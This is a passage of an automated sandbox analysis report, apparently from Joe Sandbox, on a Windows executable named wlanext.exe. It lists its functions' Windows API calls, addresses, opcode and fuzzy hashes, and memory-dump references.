                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
                                                          • Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
                                                          • Opcode Fuzzy Hash: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
                                                          • Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729
                                                          APIs
                                                          • MulDiv.KERNEL32 ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                          • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                                                          • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                                          • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                                                          APIs
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004023A2
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
                                                          • Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
                                                          • Opcode Fuzzy Hash: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
                                                          • Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004051A9
                                                            • Part of subcall function 0040408B: SendMessageA.USER32(00010390,00000000,00000000,00000000,004051BC,00000000), ref: 0040409D
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004051F5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitialize
                                                          • String ID:
                                                          • API String ID: 2896919175-0
                                                          • Opcode ID: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
                                                          • Instruction ID: 9a4107cfbe68633d7303be5c07e0fe70bc3b4157787a3ac4c512c47dfa525867
                                                          • Opcode Fuzzy Hash: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
                                                          • Instruction Fuzzy Hash: 44F02472A006009BE75067509E00B1777B0DBA0314F89043EFF84B72E0CAB548068A6D
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
                                                          • Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
                                                          • Opcode Fuzzy Hash: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
                                                          • Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,0040327F,0000000A), ref: 00406365
                                                            • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104,UXTHEME), ref: 004062E1
                                                            • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                                            • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                          • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                                                          • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                          • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\AppData\Roaming\wlanext.exe,80000000,00000003), ref: 00405B3D
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                          • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                          • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                          • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B2D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                          • Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
                                                          • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                          • Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                          • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                                                          • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                          • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                          • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                                                          • Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                                                          • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                                                          APIs
                                                          • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00405E7D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405BF4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                          • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                                                          • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                          • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405BC5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                          • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                                                          • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                          • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00405E4A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                                                          APIs
                                                          • SendMessageA.USER32(00010390,00000000,00000000,00000000,004051BC,00000000), ref: 0040409D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                          • Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
                                                          • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                          • Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C
                                                          APIs
                                                          • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
